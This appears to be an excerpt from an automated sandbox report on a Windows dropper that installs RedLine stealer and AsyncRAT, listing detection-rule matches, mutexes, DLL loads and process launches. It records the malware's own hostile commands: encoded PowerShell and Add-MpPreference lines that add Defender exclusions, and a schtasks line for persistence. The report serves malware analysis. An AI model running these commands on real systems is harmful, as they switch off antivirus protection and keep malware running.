                        Source: 9.2.Metin.exe.2ccf5a8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: Process Memory Space: M2.exe PID: 8096, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: C:\Users\user\AppData\Roaming\Metin.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: Metin.exe.1.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Metin.exe.1.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Metin.exe.1.dr, my3RaF7UH7oDR35b4JjZyhjoSI.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, my3RaF7UH7oDR35b4JjZyhjoSI.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Chrome.exe.9.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Chrome.exe.9.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: Chrome.exe.9.dr, my3RaF7UH7oDR35b4JjZyhjoSI.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: Chrome.exe.9.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Chrome.exe.9.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: Metin.exe.1.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: Metin.exe.1.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/26@3/2
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeFile created: C:\Users\user\AppData\Roaming\M2.exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\Metin.exeMutant created: \Sessions\1\BaseNamedObjects\Z89Sd3YAtsM3HT1A
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4252:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scyhx4ro.0ke.ps1Jump to behavior
                        Source: f5ATZ1i5CU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: f5ATZ1i5CU.exeReversingLabs: Detection: 78%
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_1-120
                        Source: unknownProcess created: C:\Users\user\Desktop\f5ATZ1i5CU.exe "C:\Users\user\Desktop\f5ATZ1i5CU.exe"
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA="
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Users\user\AppData\Roaming\M2.exe "C:\Users\user\AppData\Roaming\M2.exe"
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Users\user\AppData\Roaming\Metin.exe "C:\Users\user\AppData\Roaming\Metin.exe"
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Metin.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"
                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Chrome.exe C:\Users\user\AppData\Roaming\Chrome.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Chrome.exe "C:\Users\user\AppData\Roaming\Chrome.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Chrome.exe "C:\Users\user\AppData\Roaming\Chrome.exe"
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA="Jump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Users\user\AppData\Roaming\M2.exe "C:\Users\user\AppData\Roaming\M2.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Users\user\AppData\Roaming\Metin.exe "C:\Users\user\AppData\Roaming\Metin.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Metin.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeSection loaded: mswsock.dllJump to behavior
